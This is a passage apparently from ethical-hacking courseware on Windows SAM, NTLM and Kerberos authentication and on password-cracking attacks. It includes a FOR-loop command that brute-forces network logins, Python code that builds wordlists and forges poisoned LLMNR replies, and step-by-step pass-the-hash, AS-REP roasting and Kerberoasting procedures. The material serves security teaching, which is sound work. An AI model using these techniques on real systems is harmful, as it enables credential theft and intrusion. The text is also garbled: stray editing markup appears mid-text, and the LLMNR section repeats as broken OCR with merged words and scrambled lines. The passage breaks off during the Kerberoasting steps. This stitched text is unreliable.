Windows OSs use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%\system32\config\SAM in Windows systems, and Windows mounts it in the registry under the HKLM\SAM registry hive. It stores LM- or NTLM-hashed passwords. Of the two, LM password hashing is the weaker and is especially susceptible to cracking.

New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hashes by default. The LM hash is blank in the newer versions of Windows.

Selecting the option to remove LM hashes enables an additional check during password change operations but does not immediately clear LM hash values from the SAM. The SAM file stores a "dummy" value in its database, which bears no relationship to the user's actual password and is the same for all user accounts. It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to the "dummy" value when a user or administrator sets a password of more than 14 characters.
Figure 6.5: SAM file (C:\Windows\System32\config\SAM)

Note: LM hashes are disabled in Windows Vista and later Windows OSs; the LM hash is blank in those systems.
NTLM Authentication Process

NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for authentication. They differ in the cryptographic strength of the response: LM and NTLMv1 compute DES-based responses over the LM or NT hash, whereas NTLMv2 computes an HMAC-MD5 response that also covers a client nonce and a timestamp. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft-negotiated Security Support Provider (SSP).

Figure 6.6: NTLM authentication process (Windows client, domain controller)
The following steps demonstrate the process and the flow of client authentication to a domain controller using any NTLM protocol:

1. The client types the username and password into the logon window.
2. Windows runs the password through a hash algorithm and generates a hash for the password that is entered in the logon window.
3. The client computer sends a login request along with a domain name to the domain controller.
4. The domain controller generates a random value called a "nonce" (the server challenge, 8 bytes in NTLM), which it sends to the client computer.
5. The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller.
6. The domain controller retrieves the hash of the user password from the SAM (or Active Directory) and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client, and the logon is successful.
Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.
Kerberos Authentication

Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography, which provides mutual authentication. Both the server and the user verify each other's identity. Messages sent through this protocol are protected against replay attacks and eavesdropping.

Figure 6.7: Kerberos authentication process (client, Key Distribution Center (KDC), application server)

Kerberos employs the KDC, which is a trusted third party and consists of two logically distinct parts: an AS and a TGS. The authentication mechanism of Kerberos provides the user with a ticket-granting ticket (TGT) that serves post-authentication for later access to specific services, giving Single Sign-On: the user need not re-enter the password again to access any authorized service. Notably, there is no direct communication between the application servers and the KDC; the service tickets, even if packed by the TGS, reach the service only through the client who is willing to access them.
Password Cracking

▪ Password cracking techniques are used to recover passwords from computer systems.
▪ Attackers use password cracking techniques to gain unauthorized access to vulnerable systems.
▪ Most password cracking techniques are successful because of weak or easily guessable passwords.

Password cracking is the process of recovering passwords from the data transmitted by a computer system or from the data stored in it. The purpose of cracking a password might be to help a user recover a forgotten or lost password, to check for easily breakable passwords as a preventive measure by system administrators, or for use by an attacker to gain unauthorized system access.

Hacking often begins with password-cracking attempts. A password is a key piece of information necessary to access a system. Consequently, most attackers use password-cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as a dictionary or a brute-force method. Most password-cracking techniques are successful because of weak or easily guessable passwords.
Types of Password Attacks

▪ Non-Electronic Attacks: the attacker does not need technical knowledge to crack the password; hence these are known as non-technical attacks.
▪ Active Online Attacks: the attacker performs password cracking by communicating directly with the target machine.
▪ Passive Online Attacks: the attacker performs password cracking without communicating with the authorizing party.
▪ Offline Attacks: the attacker copies the target's password file to a different location on his own system and then tries to crack the passwords.

Password cracking is one of the crucial stages of system hacking. Password-cracking mechanisms often exploit otherwise legal means to gain unauthorized system access, such as recovering a user's forgotten password. The classification of password attacks depends on the attacker's actions, which are of the following four types:

▪ Non-Electronic Attacks: This is, in most cases, the attacker's first attempt at gaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc.

▪ Active Online Attacks: This is one of the easiest ways to gain unauthorized administrator-level system access. Here, the attacker communicates with the target machine to gain password access. Techniques used to perform active online attacks include password guessing, dictionary and brute-forcing attacks, hash injection, LLMNR/NBT-NS poisoning, use of Trojans/spyware/keyloggers, internal monologue attacks, Markov-chain attacks, Kerberos password cracking, etc.

▪ Passive Online Attacks: A passive attack is a type of system attack that does not lead to any changes in the system. In this attack, the attacker does not have to communicate with the system but passively monitors or records the data passing over the communication channel to and from the system. The data are then used to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attacks, replay attacks, etc.

▪ Offline Attacks: Offline attacks refer to password attacks in which an attacker tries to recover cleartext passwords from a password hash dump. Offline attacks are often time-consuming but have a high success rate, because the hashes of short passwords drawn from a small keyspace can be brute-forced (the hash itself is not reversed; candidate passwords are hashed and compared against the dump). Attackers use pre-computed hashes from rainbow tables to perform offline and distributed network attacks.
Non-Electronic Attacks

▪ Social Engineering: convincing people to reveal passwords.
▪ Shoulder Surfing: looking at either the user's keyboard or screen while he/she is logging in.
▪ Dumpster Diving: searching for sensitive information in the user's trash bins, printer trash bins, and on the user's desk for sticky notes.

Non-electronic, or non-technical, attacks do not require technical knowledge of methods of system intrusion. There are three types of non-electronic attacks: social engineering, shoulder surfing, and dumpster diving.

▪ Social Engineering

In computer security, social engineering is used to denote a non-technical type of intrusion that exploits human behavior. Typically, it relies heavily on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a "con game" to break security procedures. For example, an attacker using social engineering to break into a computer network might try to gain the trust of an authorized user of the target network and then extract information to compromise network security. Social engineering is, in effect, a run-through used to procure confidential information by deceiving or swaying people. An attacker can disguise himself/herself as a user or system administrator to obtain the user's password.

Social engineers exploit the fact that people, in general, try to build amicable relationships with their friends and colleagues and tend to be helpful and trusting. Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are unaware of the value of the information they possess, and as such, only a handful care about protecting their information. Social engineers typically search dumpsters to acquire valuable information. Furthermore, social engineers find it more challenging to obtain the combination to a safe or a health-club locker, as compared to the case of a password. The best defense is to educate, train, and create awareness about this attack and the value of information.
▪ Shoulder Surfing

Shoulder surfing is a technique of stealing passwords by hovering near legitimate users and watching them enter their passwords. In this type of attack, the attacker observes the user's keyboard or screen as they log in, and monitors what the user refers to when entering their password, for example, an object on their desk with written passwords or mnemonics. However, this attack can be performed only when the attacker is in close proximity to the target.

This attack can also be performed in the checkout lines of grocery stores, for example, when a potential victim swipes a debit card and enters the required PIN (Personal Identification Number). A PIN typically has four digits, and this renders the attack easy to perform.

▪ Dumpster Diving

"Dumpster diving" is a key attack method that exploits significant failures in computer security in the target system. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to perform garbage searching. Looking through the trash is a type of low-tech attack with numerous implications.

Dumpster diving was quite popular in the 1980s. The term itself refers to the collection of useful, general information from waste dumps such as trash cans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, credit card numbers, receipts, or other sensitive documents. Examination of waste products from dumps can help attackers in gaining unauthorized access to the target systems, and there is ample evidence to support this concept. Support staff often dump sensitive information without heeding who may be able to access it later. The information thus gathered can then be used by attackers to perform other types of attacks, such as social engineering.
Active Online Attacks: Dictionary, Brute-Force, and Rule-based Attack

▪ Dictionary Attack: a dictionary file is loaded into the cracking application that runs against user accounts.
▪ Brute-Force Attack: the program tries every combination of characters until the password is broken.
▪ Rule-based Attack: this attack is used when the attacker gets some information about the password.

Active Online Attacks: Password Guessing
▪ The attacker creates a list of all possible passwords from the information collected through social engineering or any other way and manually inputs them on the victim's machine to crack the passwords.
▪ Find a valid user; create a list of possible passwords; rank passwords from high to low probability; key in each password until the correct password is discovered.

Active Online Attacks: Default Passwords
▪ Attackers use default passwords present in the list of words or dictionary that they use to perform password guessing.
▪ Online tools to search default passwords are listed under Default Passwords below.

Active Online Attacks: Trojans/Spyware/Keyloggers
▪ The attacker installs a Trojan/spyware/keylogger on the victim's machine to collect the victim's usernames and passwords.
▪ The Trojan/spyware/keylogger runs in the background and sends back all user credentials to the attacker.

Active Online Attacks: Hash Injection/Pass-the-Hash (PtH) Attack
▪ The attacker injects a compromised hash into a local session and uses the hash to validate to network resources.
▪ The attacker finds and extracts a logged-on domain admin account hash.

Active Online Attacks: Internal Monologue Attack
▪ Attackers perform an internal monologue attack in which a local procedure call to the NTLM authentication package is invoked, using the Security Support Provider Interface (SSPI) from a user-mode application, to calculate the NetNTLM response in the context of the logged-on user.

Active Online Attacks: Pass the Ticket Attack
▪ The attacker steals the ST/TGT from an end-user machine or from a compromised AS and uses it to disguise themselves as a valid user.

▪ Brute-Force Attack

In a brute-force attack, the cracking program tries every combination of characters until the password is broken. A cipher is secure if no method exists to break it other than a brute-force attack; the discovery of the key or the plaintext faster than by a brute-force attack is one way of breaking the cipher. In general, all ciphers are deficient in mathematical proof of security. If the user chooses keys randomly or searches randomly, the plaintext will become available on average after the system has tried half of all the possible keys. Some of the considerations for brute-force attacks are as follows:
o It is a time-consuming process
o All passwords will eventually be found
▪ Rule-based Attack

Attackers use this type of attack when they obtain some information about the password. This is a more powerful attack than dictionary and brute-force attacks because the cracker knows the password type. For example, if the attacker knows that the password contains a two- or three-digit number, he/she can use some specific techniques to extract the password quickly. By obtaining useful information, such as the method in which numbers and/or special characters have been used, and the password length, attackers can minimize the time required to crack the password and therefore enhance the cracking tool. This technique involves brute force, a dictionary, and syllable attacks.

For online password-cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the categories of hybrid and syllable password-cracking attacks.

o Hybrid Attack

This type of attack depends on the dictionary attack. Often, people change their passwords merely by adding some numbers to their old passwords. In this case, the program would add some numbers and symbols to the words from the dictionary to try to crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "system1" or "system2."

o Syllable Attack

Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of syllables.
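As an added example, not courseware code: generating the candidate lists that the hybrid, rule-based and syllable attacks above describe, and sizing the brute-force keyspace they are meant to avoid. The base words, suffixes, syllables and the "contains a two- or three-digit number" rule are constructed for the example; the guesses-per-second figure is an assumed cracking rate, used only to show how the keyspace estimate is read.

```python
"""Candidate generation for hybrid, rule-based and syllable attacks, plus brute-force keyspace sizing.
Added example; not courseware code."""
import itertools
import re
import string


def hybrid_candidates(words, suffixes=("", "1", "2", "123", "!", "2020")):
    """Hybrid attack: dictionary words with common appended digits/symbols and case variants."""
    out, seen = [], set()
    for w in words:
        for variant in (w, w.capitalize(), w.upper()):
            for s in suffixes:
                cand = variant + s
                if cand not in seen:
                    seen.add(cand)
                    out.append(cand)
    return out


def syllable_candidates(syllables, max_parts=3):
    """Syllable attack: every concatenation of 1..max_parts syllables, for non-dictionary passwords."""
    out = []
    for n in range(1, max_parts + 1):
        out.extend("".join(p) for p in itertools.product(syllables, repeat=n))
    return out


def rule_filter(candidates, min_len=6, max_len=12, number_digits=(2, 3)):
    """Rule-based attack: keep only candidates matching what is known about the password,
    here a length range and the presence of a standalone two- or three-digit number."""
    lo, hi = number_digits
    num = re.compile(r"(?<!\d)\d{%d,%d}(?!\d)" % (lo, hi))
    return [c for c in candidates if min_len <= len(c) <= max_len and num.search(c)]


def keyspace(charset_size, max_len):
    """Number of strings of length 1..max_len over a charset: what brute force must cover."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def expected_seconds(charset_size, max_len, guesses_per_second):
    """Average brute-force time: half the keyspace, as the text notes."""
    return keyspace(charset_size, max_len) / 2 / guesses_per_second


def build_wordlist(words, syllables):
    """Dictionary -> hybrid -> syllable candidates, then the rule filter, preserving order
    so the most likely guesses are tried first."""
    pool = list(words) + hybrid_candidates(words) + syllable_candidates(syllables)
    return rule_filter(pool)


if __name__ == "__main__":
    WORDS = ["system", "admin"]              # constructed dictionary
    SYLLABLES = ["ad", "min", "12", "sys"]   # constructed syllable set
    print(build_wordlist(WORDS, SYLLABLES))
    # assumed 1e9 guesses/s against 7-character lowercase-alphanumeric passwords
    print(expected_seconds(len(string.ascii_lowercase + string.digits), 7, 1e9))
```

The rule filter is where the information gained about the password pays off: it discards most of the pool before any hashing happens, which is the whole advantage of a rule-based attack over brute force.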
▪ Password Guessing

Password guessing is a password-cracking technique that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other method and tries them manually on the victim's machine to crack the passwords.

The following are the steps involved in password guessing:
o Find a valid user
o Create a list of possible passwords
o Rank passwords from high to low probability
o Key in each password until the correct password is discovered

Hackers can crack passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop, or create a script file that tries each password in a list. These techniques are still considered manual cracking. The failure rate of this type of attack is high, and on domain accounts an account lockout policy limits how many guesses can be made against one account before it is locked.

Manual Password-Cracking Algorithm

In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with usernames and passwords and iterates through them using the FOR loop.

The main FOR loop can extract the usernames and passwords from the text file, which serves as a dictionary as it iterates through every line:
    [file: credentials.txt]
    administrator ""
    administrator password
    administrator administrator
    [etc.]

Type the following commands to access the text file from a directory (the trailing ^ continues the command on the next line, which cmd.exe shows with the More? prompt; 2>>nul discards error output so only successful attempts reach outfile.txt):

    C:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
    More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
    More? 2>>nul^
    More? && echo %time% %date% >> outfile.txt^
    More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
    C:\>type outfile.txt
The outfile.txt file contains the correct username and password, if the username and password in credentials.txt are correct. An attacker can then establish an open session with the victim server from his/her own system.
▪ Default Passwords

Default passwords are those supplied by manufacturers with new equipment (e.g., switches, hubs, routers). Usually, default passwords provided by the manufacturers of password-protected devices allow the user to access the device during the initial setup and then change the password. However, often an administrator will either forget to set the new password or ignore the password-change recommendation and continue using the original password. Attackers can exploit this lapse and find the default password for the target device from manufacturer websites or using online tools that show default passwords, and then use it to access the target device successfully. Attackers use default passwords in the list of words or dictionary that they use to perform password-guessing attacks.

The following are some of the online tools to search default passwords:
o http://open-sez.me
o https://www.fortypoundhead.com
o https://cirt.net
o http://www.defaultpassword.us
o http://defaultpasswords.in
o https://www.routerpasswords.com
o https://default-password.info

Figure 6.8: Screenshot showing default passwords
▪ Trojans/Spyware/Keyloggers

A Trojan is a program that masks itself as a benign application. The software initially appears to perform a desirable or benign function, but instead steals information or harms the system. With a Trojan, attackers can gain remote access and perform various operations on the target computer, limited by the user's privileges.

Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect.

A keylogger is a program that records all user keystrokes without the user's knowledge. Keyloggers ship the log of user keystrokes to an attacker's machine or hide it on the victim's machine for later retrieval. The attacker then scrutinizes the log to find passwords or other useful information that could compromise the system.

An attacker installs a Trojan/spyware/keylogger on a victim's machine to collect their usernames and passwords. These programs run in the background and send back all user credentials to the attacker. For example, a keylogger on a victim's computer can reveal the contents of all user emails. The following image depicts a scenario describing how an attacker gains password access using a Trojan/spyware/keylogger.
Figure 6.9: Active online attack using Trojan/spyware/keylogger

▪ Hash Injection/Pass-the-Hash (PtH) Attack

Figure 6.10: Hash injection attack (attacker, user computer, server)

A hash injection attack allows an attacker to inject a compromised hash into a local session and use it to validate to network resources. Cached hashes and their offline usage can be restricted by the network admin; hence, this approach may not always be feasible. The attacker obtains hashes in the following ways:

o The attacker dumps the password hashes from the local user account database or SAM to retrieve the password hashes of local users, and gains access to admin accounts to compromise other connected systems.
o The attacker captures LM or NTLM challenge-response messages between the client and server and recovers the password hashes from them by brute-forcing the responses offline.
o The attacker retrieves the credentials of local users as well as those belonging to the security domain from the Windows lsass.exe process.

The hacker carries out this attack by implementing the following steps:
1. The hacker compromises one workstation/server using a local/remote exploit.
2. The hacker extracts stored hashes using tools such as pwdump7, Mimikatz, etc. and finds a domain admin account hash.
3. The hacker uses tools such as Mimikatz to place one of the retrieved hashes in his/her local lsass.exe process and then uses the hash to log on to any system (domain controller) with the same credentials.
4. The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.
</gr_repl

ace>
<gr_replace lines="27583-27635" cat="clarify" orig="LLMNR/NBT-NS">
▪ LLMNR/NBT-NS Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSs used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSs. When the DNS server fails to resolve a name query, the host performs an unauthenticated query on the local link, multicast for LLMNR and broadcast for NBT-NS, asking all the hosts whether anyone has the name it is looking for. As the host trying to connect is following an unauthenticated multicast/broadcast process, it becomes easy for an attacker to passively listen on the network for LLMNR (UDP port 5355) and NBT-NS (UDP port 137) queries and respond to the request pretending to be the target host. After the victim connects to the attacker's host, the attacker can utilize tools such as Responder.py or Metasploit to forward the request to a rogue server (for instance, a rogue SMB service) that initiates an authentication process.

During that authentication process, the victim host sends its NTLMv2 challenge-response (commonly called the NTLMv2 hash) to the rogue server. This response is stored on disk and can be cracked using offline hash-cracking tools such as hashcat or John the Ripper. Once cracked, these credentials can be used to log in and gain access to the legitimate host system.

Steps involved in LLMNR/NBT-NS poisoning:
1. The user sends a request to connect to the data-sharing system \\DataServer, which she mistakenly typed as \\DtaServr.
2. The DNS server responds to the user, saying that it does not know the host named \\DtaServr.
3. The user then performs an LLMNR/NBT-NS query on the local network to find out if anyone knows the hostname \\DtaServr.
4. The attacker replies to the user saying that it is \\DtaServr, accepts the user's NTLMv2 hash, and responds to the user with an error.

Figure 6.11: LLMNR/NBT-NS poisoning attack (the DNS server answers NOT FOUND; the attacker responds claiming to be \\DtaServr)
LLMNR/NBT-NS
Poisoning
LLMINR LocalMulticastNameResolution)
(Link andNBT-NS NameService)
(NetBIOS are
main elements
‘two of WindowsOSsusedto performname resolution
for hostspresent
on the same link.Theseservicesare enabledbydefaulti n WindowsOSs.
When the ONS server fails to resolve name queries, the host performs an
unauthenticated UDPbroadcast asking all the hostsif anyonehas a name that it is
looking for.Asthe hosttryingto connect is following a n unauthenticatedandbroadcast
process, it becomes easyforan attackerto passivelylistento a networkfor LLMINR(UDP
port 5355)and NBT-NS(UDPport 137)broadcastsand respond to the request
pretending to be a targethost.After accepting a connection with a host,the attacker
can utilizetoolssuchas Responder.py or Metasploit to forwardthe request to a rogue
server (forinstance, to perform
TCP:137) an authentication process
During the authentication process,the attacker sendsan NTLMv2hashto the rogue
server, whichwas obtainedfrom the host tryingto authenticateitself. Thishash is
storedi n a diskandcan becracked usingofflinehash-cracking toolssuchas hashcat or
Johnthe Ripper. Oncecracked,thesecredentialsc an beusedto login andgainaccessto
the legitimate hostsystem
involvedi n LLMNR/NBT-NS
Steps poisoning:
1. Theuser sendsa requestto connect to the data-sharing \\DataServer,
system, which
shemistakenlytypedas \\DtaServr.
responds
The\\DataServer to the user, sayingthat it doesnot knowthehostnamed
\\OtaServr.
The user then performs
a LLMNR/NBT-NS
broadcastto find out if anyonei n the
networkknowsthe hostname\\DtaServr.
to the user sayingthat it is \\DataServer,
The attackerreplies the
accepts user
NTLMv2 hash,andresponds to the user
with
an error.
cumin
2
\oeasene―
WoFOUN
Atacte responds
vying
thot be hows WDSc
6.11: UMNR/NBT-NS
Figure poisoningattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
LLMNR/NBT-NS Poisoning Tools

▪ Responder
Source: https://github.com

Responder is an LLMNR, NBT-NS (NetBIOS Name Service), and MDNS poisoner. It responds to specific NBT-NS queries based on their name suffix. By default, the tool only responds to a File Server Service request, which is for SMB. As shown in the screenshots, attackers use the Responder tool to extract information such as the target system's OS version, client version, NTLM client IP address, NTLM username, and password hash.

Figure 6.12: Screenshot of Responder (ubuntu@ubuntu:~/Responder$ ... Responder.py ...)

Figure 6.13: Screenshot showing the output of Responder with NTLM hashes
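As an added example (not part of the courseware or of Responder): the packet-level view of the exchange described above. LLMNR reuses the DNS message format over UDP 5355 to 224.0.0.252; the code below builds the query a Windows host would multicast for \\DtaServr, the poisoned answer a tool like Responder returns, and the canary check a defender can run: query a name that must never resolve and treat any answer as a poisoner. The transaction ID, name and addresses are constructed values, and the parser covers only the A-record answers this exchange uses.

```python
"""LLMNR (RFC 4795, DNS wire format on UDP 5355) query/answer builder and poisoning canary.
Added example; not courseware or Responder code."""
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, zero terminator."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a host multicasts after DNS fails to resolve `name` (flags 0, one question)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_packet(pkt: bytes) -> dict:
    """Parse the header, the question and any A-record answers (name given as a C00C pointer)."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    off, labels = 12, []
    while pkt[off] != 0:
        ln = pkt[off]
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    off += 1
    qtype, _qclass = struct.unpack(">HH", pkt[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        _ptr, atype, _aclass, ttl, rdlen = struct.unpack(">HHHIH", pkt[off:off + 12])
        off += 12
        rdata, off = pkt[off:off + rdlen], off + rdlen
        if atype == QTYPE_A and rdlen == 4:
            answers.append((socket.inet_ntoa(rdata), ttl))
    return {"id": txid, "is_response": bool(flags & 0x8000), "name": ".".join(labels),
            "qtype": qtype, "answers": answers}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's reply: same ID and question, response flag set, one A record -> attacker."""
    q = parse_packet(query)
    header = struct.pack(">HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack(">HH", q["qtype"], QCLASS_IN)
    answer = struct.pack(">HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def canary_alert(sent_txid: int, canary_name: str, reply: bytes):
    """Defender's check: a canary name that exists nowhere must never get an answer.
    Returns the responding IPs (suspected poisoners) or an empty list."""
    r = parse_packet(reply)
    if r["is_response"] and r["id"] == sent_txid and r["name"].lower() == canary_name.lower():
        return [ip for ip, _ttl in r["answers"]]
    return []


if __name__ == "__main__":
    # Constructed exchange: the mistyped share name from the text and an attacker at 10.0.0.66.
    q = build_query(0x1234, "DtaServr")
    reply = build_poisoned_response(q, "10.0.0.66")
    print(parse_packet(reply))
    print("poisoner(s):", canary_alert(0x1234, "DtaServr", reply))
    # Live use (not run here): sendto(q, (LLMNR_GROUP, LLMNR_PORT)) on a UDP socket and feed
    # every datagram received back into canary_alert().
```

The canary works because a legitimate network never answers for a name that does not exist; the usual hardening is to remove the attack surface altogether by disabling LLMNR through Group Policy (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NetBIOS over TCP/IP on the adapters.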
▪ Internal Monologue Attack

The internal monologue attack is similar to the attack performed using Mimikatz, except that the memory area of the Local Security Authority Subsystem Service (LSASS) process is not dumped, thereby avoiding Windows Credential Guard and antivirus. Mimikatz is a post-exploitation tool through which attackers can extract plaintext passwords, Kerberos tickets, and NTLM hashes from LSASS process memory. Attackers use Mimikatz to retrieve user credentials from LSASS process memory, and the acquired information helps them in performing lateral movement in the post-exploitation phase.

An internal monologue attack is usually performed in a secure environment where Mimikatz cannot be executed. In this attack, using the Security Support Provider Interface (SSPI) from a user-mode application, a local procedure call to the NTLM authentication package is invoked to calculate the NetNTLM response in the context of the logged-on user.

Steps to perform an internal monologue attack:
1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic (these live under the HKLM\SYSTEM\CurrentControlSet\Control\Lsa key, so this step requires administrative rights).
2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.
3. Now, the attacker interacts with NTLM SSP locally, for each masqueraded user, to obtain a NetNTLMv1 response to a chosen challenge in the security context of that user.
4. Now, the attacker restores NTLMMinClientSec, LMCompatibilityLevel, and RestrictSendingNTLMTraffic to their actual values.
5. The attacker uses rainbow tables to recover the NTLM hash from the captured NetNTLMv1 responses; the fixed, chosen challenge is what makes a precomputed table applicable.
6. Finally, the attacker uses the recovered hashes to gain system-level access.
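Steps 1 and 4 above lower, and later restore, three LSA registry values; an administrator can evaluate whether a given set of values lets a local NetNTLMv1 response be obtained, and a detection can compare a snapshot against a baseline to spot the tampering window. The evaluator below is an added example (not courseware code). The values it runs on are constructed; the meanings of LMCompatibilityLevel 0-5 and RestrictSendingNTLMTraffic 0-2 follow their documented definitions, while treating any non-zero NTLMMinClientSec as "NTLMv2 session security required" and reading a missing LMCompatibilityLevel as 3 are simplifying assumptions made here.

```python
"""Evaluate the NTLM client policy values the internal monologue attack tampers with, and diff a
snapshot against a baseline to spot the tampering. Added example; not courseware code."""
LMCOMPAT = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM; use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only; refuse LM",
    5: "Send NTLMv2 response only; refuse LM & NTLM",
}
RESTRICT_OUT = {0: "Allow all", 1: "Audit all", 2: "Deny all"}

# Values the internal monologue technique sets before asking NTLMSSP for a response
ATTACK_VALUES = {"LMCompatibilityLevel": 2, "NTLMMinClientSec": 0, "RestrictSendingNTLMTraffic": 0}
# A hardened baseline (assumed): NTLMv2 only, 128-bit + v2 session security required, outbound NTLM denied
HARDENED_BASELINE = {"LMCompatibilityLevel": 5, "NTLMMinClientSec": 0x20080000, "RestrictSendingNTLMTraffic": 2}


def netntlmv1_obtainable(values: dict) -> tuple:
    """True when a client in this state would hand out a NetNTLMv1 (DES over the NT hash) response.
    Assumptions: a missing LMCompatibilityLevel is read as 3 (the Vista-and-later default) and any
    non-zero NTLMMinClientSec is treated as requiring NTLMv2 session security."""
    reasons = []
    level = values.get("LMCompatibilityLevel", 3)
    minsec = values.get("NTLMMinClientSec", 0)
    restrict = values.get("RestrictSendingNTLMTraffic", 0)
    if level >= 3:
        reasons.append("LMCompatibilityLevel=%d: %s" % (level, LMCOMPAT[level]))
    if minsec:
        reasons.append("NTLMMinClientSec=0x%x requires NTLMv2 session security" % minsec)
    if restrict == 2:
        reasons.append("RestrictSendingNTLMTraffic=2: %s" % RESTRICT_OUT[restrict])
    return (not reasons), reasons


def tampering_diff(baseline: dict, snapshot: dict) -> list:
    """Detection side: every value that has drifted from the baseline, with both readings."""
    return [(k, baseline.get(k), snapshot.get(k)) for k in baseline if baseline.get(k) != snapshot.get(k)]


if __name__ == "__main__":
    print(netntlmv1_obtainable(HARDENED_BASELINE))
    print(netntlmv1_obtainable(ATTACK_VALUES))
    print(tampering_diff(HARDENED_BASELINE, ATTACK_VALUES))
```

Because step 4 restores the original values, a one-off audit will usually see the hardened state; the diff is only useful when the snapshot is taken continuously (for example, from registry change auditing), which is the detection this attack is designed to slip past.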
Figure 6.14: Depiction of internal monologue attack

Cracking Kerberos Password
Kerberos is the most commonly used authentication protocol for network entities. Due to its widespread acceptance, it is susceptible to various attacks. Attackers have developed various ways to hack into Kerberos and exploit its vulnerabilities to crack weak passwords, inject malicious code, and obtain information about the network infrastructure and various network entities. Attackers target the Kerberos authentication protocol in two common ways: namely, cracking the TGS, known as Kerberoasting, and cracking the TGT, known as AS-REP Roasting.

▪ AS-REP Roasting (Cracking TGT)

In this attack, attackers request an authentication ticket (TGT) from the KDC in the form of an AS-REQ packet. If the user account exists, the KDC replies with an AS-REP that carries the TGT together with an encrypted part (holding the session key) protected by a key derived from the account's password. This allows attackers to receive encrypted material that can be saved offline and cracked to obtain the password. Attackers can perform this type of attack both actively and passively. In an active scenario, attackers send an AS-REQ for the user and collect the AS-REP, whereas in a passive scenario, attackers observe an AS-REP message on the network.

In Kerberos authentication, pre-authentication is enabled by default and is designed to prevent exactly this offline password-guessing attack. Therefore, to perform an AS-REP Roasting attack, attackers must identify user accounts with pre-authentication disabled, i.e., the user account must be set to "Do not require Kerberos preauthentication." Attackers use tools such as Rubeus to perform AS-REP roasting attacks.

The following steps are involved in AS-REP Roasting:
1. The attacker identifies a user account with the pre-authentication option disabled.
2. On behalf of the user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
3. The domain controller verifies that the user account exists and replies with an AS-REP whose encrypted part is protected by the account's password-derived key.
4. The attacker stores the AS-REP offline and cracks it to extract the user account password and further access the network entity (here, the application server).

Figure 6.15: AS-REP Roasting (attacker, domain controller/KDC, application server)
▪ Kerberoasting (Cracking TGS)

In this attack, attackers request a TGS (service ticket) for the service principal name (SPN) of the target service account. This request is made to the domain controller using a valid domain user's authentication ticket (TGT). The domain controller does not check whether the user is actually permitted to use the service; it simply searches for the SPN in Active Directory and replies with a service ticket encrypted using the key of the service account linked with the SPN. When the encryption type used for the requested service ticket (ST) is RC4_HMAC_MD5, the key used for encrypting the ST is the service account's NTLM password hash. To crack the ST, attackers export the TGS tickets from memory and save them offline on the local system. They then compute the NTLM hash of each candidate password and try to decrypt the ST with it; on successfully cracking it, the service account password is discovered. Attackers use tools such as Kerberoast to perform Kerberoasting attacks on Kerberos authentication.

The following steps are involved in Kerberoasting:
1. On behalf of a user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
